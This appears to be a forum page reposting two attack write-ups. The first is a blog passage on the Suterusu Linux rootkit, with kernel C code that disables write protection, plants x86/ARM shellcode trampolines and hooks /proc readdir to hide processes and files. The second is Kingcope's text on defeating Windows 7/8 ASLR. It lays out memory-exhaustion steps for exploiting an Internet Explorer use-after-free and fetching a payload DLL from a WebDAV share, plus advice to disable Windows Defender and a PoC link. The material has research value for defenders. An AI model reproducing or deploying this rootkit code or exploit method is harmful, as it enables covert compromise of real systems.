[TH]DESCRIPTION[/TH] [/TR] [TR] [TD]16[/TD] [TD]WP[/TD] [TD]Write protect[/TD] [TD]Determines whether the CPU can write to pages marked read-only[/TD] [/TR] [/TABLE] The WP bit will need to be set and reset at multiple points in the code, so it makes programmatic sense to abstract the operations. The following code originates from the PaX project, specifically from the native_pax_open_kernel() and native_pax_close_kernel() routines. Extra caution is taken to prevent a potential race condition caused by unlucky scheduling on SMP systems, as explained in a blog post by Dan Rosenberg: inline unsigned long disable_wp ( void ) { unsigned long cr0; preempt_disable(); barrier(); cr0 = read_cr0(); write_cr0(cr0 & ~X86_CR0_WP); return cr0; } inline void restore_wp ( unsigned long cr0 ) { write_cr0(cr0); barrier(); preempt_enable_no_resched(); } Function Hooking on ARM A number of significant changes exist in the hijack_* set of hooking routines depending on whether the code is compiled for x86 or ARM. For instance, the concept of a WP bit does not exist on ARM while special care must be taken to handle data and instruction caching introduced by the architecture. While the concepts of data and instruction caching do exist on the x86 and x86_64 architectures, such features did not pose an obstacle during development. Modified to address these new architectural characteristics is a version of hijack_start() specific to ARM: void hijack_start ( void *target, void *new ) { struct sym_hook *sa; unsigned char o_code[HIJACK_SIZE], n_code[HIJACK_SIZE]; if ( (unsigned long)target % 4 == 0 ) { // ldr pc, [pc, #0]; .long addr; .long addr memcpy(n_code, "\x00\xf0\x9f\xe5\x00\x00\x00\x00\x00\x00\x00\x00", HIJACK_SIZE); *(unsigned long *)&n_code[4] = (unsigned long)new; *(unsigned long *)&n_code[8] = (unsigned long)new; } else // Thumb { // add r0, pc, #4; ldr r0, [r0, #0]; mov pc, r0; mov pc, r0; .long addr memcpy(n_code, "\x01\xa0\x00\x68\x87\x46\x87\x46\x00\x00\x00\x00", HIJACK_SIZE); *(unsigned long *)&n_code[8] = (unsigned long)new; target--; } memcpy(o_code, target, HIJACK_SIZE); memcpy(target, n_code, HIJACK_SIZE); cacheflush(target, HIJACK_SIZE); sa = kmalloc(sizeof(*sa), GFP_KERNEL); if ( ! sa ) return; sa->addr = target; memcpy(sa->o_code, o_code, HIJACK_SIZE); memcpy(sa->n_code, n_code, HIJACK_SIZE); list_add(&sa->list, &hooked_syms); } As displayed above, shellcodes for ARM and Thumb are included to redirect execution, similar to those on x86/_64. Instruction Caching on ARM Most Android devices do not enforce read-only kernel page permissions, so at least for now we can forego any potential voodoo magic to write to protected memory regions. It is still necessary, however, to consider the concept of instruction caching on ARM when performing a function hook. ARM CPUs utilize a data cache and instruction cache for performance benefits. However, modifying code in-place may cause the instruction cache to become incoherent with the actual instructions in memory. According to the official ARM technical reference, this issue becomes readily apparent when developing self-modifying code. The solution is to simply flush the instruction cache whenever a modification to kernel text is made, which is accomplished by a call to the kernel routine flush_icache_range(): void cacheflush ( void *begin, unsigned long size ) { flush_icache_range((unsigned long)begin, (unsigned long)begin + size); } Pros and Cons of Inline Hooking As with most techniques, inline function hooking presents various benefits and detriments when compared to simply hijacking the system call table: Pro: Any function may be hijacked, not just system calls. Pro: Less commonly implemented in rootkits, so it is less likely to be detected by rootkit detectors. It is also easy to circumvent simple hook detection engines due to the flexibility of assembly languages. A variety of detection evasion techniques for x86 may be found in the article x86 API Hooking Demystified. Pro: Inline function hooking may be applied to userland with minimal/no modification. While working on the Android port of DMTCP, an application checkpointing tool out of Northeastern’s HPC lab, it was possible to simply copy and paste the entirety of the hijack_* routines, modified only to use userland linked lists. Con: The current hooking implementation is not thread-safe. By temporarily unhooking a function via hijack_pause(), a race window is opened for other threads to execute the unhooked function before hijack_resume() is called. Potential solutions include crafty use of locking and permanently hijacking the target function and inserting extra logic within the hook-with routine. However, with the latter option, special care must be taken when executing the original function prologue on architectures characterized by variable-length instructions (x86/_64) and PC/IP-relative addressing (x86_64 and ARM). Con: Another harmful possibility in the current implementation is hook recursion. Moreso an issue of poor implementation than any insurmountable design flaw, there are various easy solutions to the problem of having your hook-with function accidentally call the hooked function itself, leading to infinite recursion. Great information on the topic and proof of concept code can (once again) be found in the article x86 API Hooking Demystified. Hiding Processes, Files, and Directories Once a reliable hooking “framework” is implemented, it’s fairly trivial to start intercepting interesting functions and doing interesting things. One of the most basic things a rootkit must do is hide processes and filesystem objects, both of which may be accomplished with the same basic technique. In the Linux kernel, one or more instances of the file_operations struct are associated with each supported filesystem (usually one instance for files and one for directories, but dig into the kernel source code and you’ll find that filesystems are a certain kind of special). These structs contain pointers to the routines associated with different file operations, for instance reading, writing, mmap’ing, modifying permissions, etc. For explicatory purposes, we will examine the instantiation of the file_operations struct on ext3 for directory objects: const struct file_operations ext3_dir_operations = { .llseek = generic_file_llseek, .read = generic_read_dir, .readdir = ext3_readdir, .unlocked_ioctl = ext3_ioctl, #ifdef CONFIG_COMPAT .compat_ioctl = ext3_compat_ioctl, #endif .fsync = ext3_sync_file, .release = ext3_release_dir, }; To hide an object on the filesystem, it is possible to simply hook the readdir function and filter out any undesired items from its output. To maintain a level of system agnosticism, Suterusu dynamically obtains the pointer to a filesystem’s active readdir routine by navigating the target object’s file struct: void *get_vfs_readdir ( const char *path ) { void *ret; struct file *filep; if ( (filep = filp_open(path, O_RDONLY, 0)) == NULL ) return NULL; ret = filep->f_op->readdir; filp_close(filep, 0); return ret; } The actual hook process (for hiding items in /proc) looks like: #if LINUX_VERSION_CODE > KERNEL_VERSION(2, 6, 30) proc_readdir = get_vfs_readdir("/proc"); #endif hijack_start(proc_readdir, &n_proc_readdir); The kernel version check is in response to a change implemented in version 2.6.31 that removes the exported proc_readdir() symbol from include/linux/proc_fs.h. In previous versions it was possible to simply retrieve the pointer value externally upon linking, but rootkit developers are now forced to obtain it by alternate, manual means. To perform the actual hiding of an objects in /proc, Suterusu hooks proc_readdir() with the following routine: static int (*o_proc_filldir)(void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type); int n_proc_readdir ( struct file *file, void *dirent, filldir_t filldir ) { int ret; o_proc_filldir = filldir; hijack_pause(proc_readdir); ret = proc_readdir(file, dirent, &n_proc_filldir); hijack_resume(proc_readdir); return ret; } The real heavy lifting occurs in the filldir function, which serves as a callback executed for each item in the directory. This is replaced with a malicious n_proc_filldir() function, as follows: static int n_proc_filldir( void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type ) { struct hidden_proc *hp; char *endp; long pid; pid = simple_strtol(name, &endp, 10); list_for_each_entry ( hp, &hidden_procs, list ) if ( pid == hp->pid ) return 0; return o_proc_filldir(__buf, name, namelen, offset, ino, d_type); } Since the intention is to hide processes by hijacking the readdir/filldir routines of /proc, Suterusu simply performs a match of the object name against a linked list of all PIDs the user wishes to hide. If a match is found, the callback returns 0 and the item is hidden from the directory listing. Otherwise, the original proc_filldir() function is executed and its value returned. This same concept applies for hiding files and directories, except a direct string match against the object name is performed instead of converting the PID name to a number type first: static int n_root_filldir( void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type ) { struct hidden_file *hf; list_for_each_entry ( hf, &hidden_files, list ) if ( ! strcmp(name, hf->name) ) return 0; return o_root_filldir(__buf, name, namelen, offset, ino, d_type); } Sursa: Suterusu Rootkit: Inline Kernel Function Hooking on x86 and ARM | Michael Coppola's Blog
  25. Attacking the Windows 7/8 Address Space Randomization ================================================================================ Attacking the Windows 7/8 Address Space Randomization Copyright © 2013 Kingcope "Was nicht passt wird passend gemacht" (English: "If it don't fit, use a bigger hammer.") German phrase ================================================================================ Synopsis - What this text is all about ================================================================================ The following text is what looks like an attempt to circumvent windows 7 and windows 8 memory protections in order to execute arbritrary assembly code. The presented methods are in particular useful for client-side attacks as used for example in browser exploits. The topic that is discussed is a very complex one. At the time I started the research I thought the idea behind the attack will be applied to real-world scenarios quick and easy. I had to be convinced by the opposite. The research was done without knowing much about the real internals of the windows memory space protection but rather using brute force, trial & failure in order to achieve what will be presented in the upcoming text. Be warned - the methods to attack the protection mechanisms hereby presented are not failsafe and can be improved. Tough in many cases it is possible to completely bypass Windows 7 and especially Windows 8 ASLR by using the techniques. Target Software ================================================================================ The used operating systems are Windows 7 and Windows 8, the included PoC code runs on 32 Bits platforms and exploits Internet Explorer 8. All can be applied to Internet Explorer 9 with modifications to the PoC code. For Internet Explorer 10 the memory protection bypass is included and demonstrated in the PoC. Executing code through return oriented programming is left as an excercise to the reader. The PoC makes use of the following vulnerability and therefore for testing the PoC the patch must not be installed. MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability This vulnerability is identified as CVE-2012-4969. It might be possible to use the very same method to exploit other browsers as other browsers give similar opportunities to the exploit writer. I don't want to sound crazy but even other Operating Systems might be affected by this, yet unconfirmed. Current ways to exploit browsers ================================================================================ Today alot of attention is brought to client side exploits especially inside web browsers. Normally the exploitation is done through the old known method of spraying the heap. This is done by populating the heap with nopsleds and actual shellcode. By filling the heap in this way a heap overrun can be used to rewrite the instruction pointer of the processor to a known heap address where the shellcode resides quite deterministic. In order to bypass protections like Data Execution Prevention a ROP chain is built. There are exploits that install a stack pivot in the first place in order to exploit a heap overrun as it would be a stack based buffer overrun using a "return into code" technique. The mentioned modern ways to exploit heap corruptions are documented very well. When it comes to Windows 7 and Windows 8 exploitation the exploit writer will face the obstacle of randomized memory space. There remains the simple question where do I jump to when having control over the instruction pointer? It might by possible to leak memory directly from the web browser and use this information to gain information about the correct offsets and executable code sections. This requires knowledge about a memory leak bug tough and therefore is not used alot. Another option is to use old DLLs that do not have their image bases randomized, for example older Java versions are known to have un- randomized image bases. This option requires the use of third-party software that has to be installed. This text will present a new way to deal with the 'where do i jump when I have code execution' problem. Introduction to Windows memory randomization ================================================================================ Windows 7 and Windows 8 have a special security relevant protection programmed in. The so called A.S.L.R or '[A]ddress pace [L]ayout [R]andomization' that does nothing more than randomize every piece of memory, say its offsets. For example the program image is randomized, the DLLs the program uses are randomized too. There is not a single piece of memory from what one could say after a reboot the data in the memory space will be at the same place as before the reboot. The addresses even change when a program is restarted. ActiveX and other useful features ================================================================================ Web browser exploits have many advantages to other kinds of exploits. For example JavaScript code can be executed inside the webbrowser. This is also the tool that heap spraying makes use of. Let us have a look at what happens if we load an ActiveX object dynamically when a web page loads. The ActiveX object we will load is the Windows Media Player control. This can either be done using JavaScript or plain HTML code. At the point the ActiveX object is loaded Windows will internally load the DLLs into memory space if they previously where not inside the programs memory space. The offset of loading the DLLs in memory space is completely random. At least it should be. Let us now see how we can manage to put a DLL into memory space at a fixed address by loading an ActiveX object at runtime. Exhausting memory space and squeezing DLLs into memory ================================================================================ The nuts and bolts of what is presented here is the idea that DLLs are loaded into memory space if there is memory available, and if there is no memory or only small amounts of memory available then the DLL will be put into the remaining memory hole. This sounds simple. And it works, we can load a DLL into a remaining memory hole. First of all the exploit writer has to code a javascript routine that does fill memory until the memory boundary is hit and a javascript exception is raised. When the memory is filled up the installed javascript exception handler will execute javascript code that frees small chunks of memory in several steps, each step the javascript code will try to load an ActiveX object. The result is that the DLL (sometimes there are several DLLs loaded for an ActiveX object) will be loaded at a predictable address. This means that now the exploit writer has a predictable address to jump to and the 'where do i jump when I have code execution' problem is solved. One problem the method has is that Windows will become unresponsive at the time memory is exhausted but will resume normal operation after the DLL is loaded at a fixed address and the memory is freed using the javascript code. Summary of exploitation stages: * Fill the heap with random bytes until all memory is used up. During the heap filling stage Windows might become unresponsive and will relax soon afterwards ·* Free small heap blocks one by one and try adding a DLL (for example by using a new ActiveX Object that is loadable without a warning by Internet Explorer) This DLL (and the DLLs that are loaded from it) will be squeezed into the remaining memory region (the space that was freed by us through JavaScript). This address is fixed and predictable for us to jump to * Free the remaining memory blocks which were allocated before * Spray the heap using the well known method * Finally trigger the heap corruption and jump to this fixed DLL base to execute our code in a ROP manner. To say it abstract the exploit writer has to be especially careful about the timing in the JavaScript code and about the memory the exploit routines themselves take up. ROP chain and the LoadLibrary API ================================================================================ At the time we have loaded the DLL at a predictable address it is possible to use a ROP chain in order to execute shellcode. The PoC code goes a much simpler path. It will use a short ROP chain and call the LoadLibrary API that is contained in the Windows Media Player DLLs. This way another DLL can be fetched from a WebDAV share and loaded into the Internet Explorer memory space in order to fully execute arbritrary code. Windows 8 singularity ================================================================================ Testcases have shown that Windows 8 behaves more vulnerable to the method than Windows 7. In Windows 8 the DLL will be loaded at the very low address 0x10000 and more reliable than in Windows 7. Windows 7 is much more persistant in loading the DLL at a fixed memory address. The testcases for Windows 7 have shown that the DLL will be loaded at the predictable address at least 7 out of 10 times of loading the exploit. The PoC codes ================================================================================ There are two different PoCs, one for Windows 7 and one for Windows 8. The Windows 8 code is a slightly modified version of the Windows 7 code. Please note that Windows Defender detects the Win8 PoC as being an exploit and blocks execution. The parts which are detectable by windows defender are not needed for the A.S.L.R. attack to work. Please disable Windows Defender if you test the Windows 8 PoC for now. The Windows 7 PoC is successful if it loads gdiplus.dll at the predictable fixed offset 0x7F7F0000. If you are lucky and have set up the exploit appropriately the payload will be executed, which is currently a MessageBox that pops up. The Windows 8 PoC is successful if it loads gdiplus.dll at the predictable fixed offset 0x10000. Please note that wmp.dll (Windows Media Player DLL) and gdiplus.dll should not be in the Internet Explorer address space prior to executing the PoC for it to succeed. As a final note, the PoC does not depend on the ActiveX control that is added it can be changed with some effort to load a different DLL. Here are the mappings I tested when the PoC succeeds: Windows 7 32-Bit Service Pack 0 & Service Pack 1 across reboots: Address Size Owner Section Contains Type Access 7F7F0000 00001000 gdiplus PE header Imag R RWE 7F7F1000 0016B000 gdiplus .text code,imports Imag R RWE 7F95C000 00008000 gdiplus .data data Imag R RWE 7F964000 00001000 gdiplus Shared Imag R RWE 7F965000 00012000 gdiplus .rsrc resources Imag R RWE 7F977000 00009000 gdiplus .reloc relocations Imag R RWE Windows 8 32-Bit across reboots: Address Size Owner Section Contains Type Access 00010000 00001000 gdiplus PE header Imag R RWE 00011000 00142000 gdiplus .text code,exports Imag R RWE 00153000 00002000 gdiplus .data Imag R RWE 00155000 00003000 gdiplus .idata imports Imag R RWE 00158000 00012000 gdiplus .rsrc resources Imag R RWE 0016A000 00009000 gdiplus .reloc relocations Imag R RWE The archive containing the PoCs is found here: http://www.farlight.org/rlsa.zip Enjoy! Sursa: http://kingcope.wordpress.com/
×
×
  • Create New...